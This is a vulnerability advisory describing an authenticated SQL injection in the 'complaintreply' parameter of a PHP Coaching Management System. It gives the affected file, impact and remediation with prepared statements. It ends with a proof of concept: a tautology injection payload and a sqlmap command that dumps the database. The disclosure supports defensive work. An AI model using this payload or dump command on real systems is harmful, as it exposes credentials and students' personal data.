# Vulnerability Summary: CVE-2026-7229-SQLI ## Vulnerability Overview **Title**: Authentication SQL Injection in Coaching Management System Allows Database Dumping **Type**: SQL Injection (SQLi) **Description**: In the PHP-based Coaching Management System, the `complaintreply` parameter within the administrator functionality module is not properly sanitized before being used in SQL queries. An authenticated attacker (administrator) can inject malicious SQL queries, resulting in the complete extraction of the database. ## Impact Scope * **Affected File**: `/cims/modules/admin/reply.php` * **Affected Parameter**: `complaintreply` * **Attack Vector**: Remote, Authenticated (Administrator) * **Database**: MySQL (MariaDB) * **Impact**: Database Dump / Credential Leakage * **Severity**: CRITICAL * Potential for full database extraction * Exposure of credentials in plaintext * Complete leakage of application data * Authentication bypass and privilege escalation via credential extraction * Full database dump achieved, including user tables (credentials), student PII, teacher records, and complaint history. ## Remediation * **Vendor**: code-projects.org * **Product**: Coaching Management System in PHP * **Version**: Unknown (tested on the latest version available as of April 2026) * **Recommendation**: Implement strict input validation and sanitization for the `complaintreply` parameter. Use prepared statements (parameterized queries) to prevent SQL injection. ## Proof of Concept (POC) Code **1. Injection Payload** ```sql complaintreply=" OR 1=1-- &submit=submit ``` **2. Database Dump Command** ```bash sqlmap -r sql1.txt --dump ```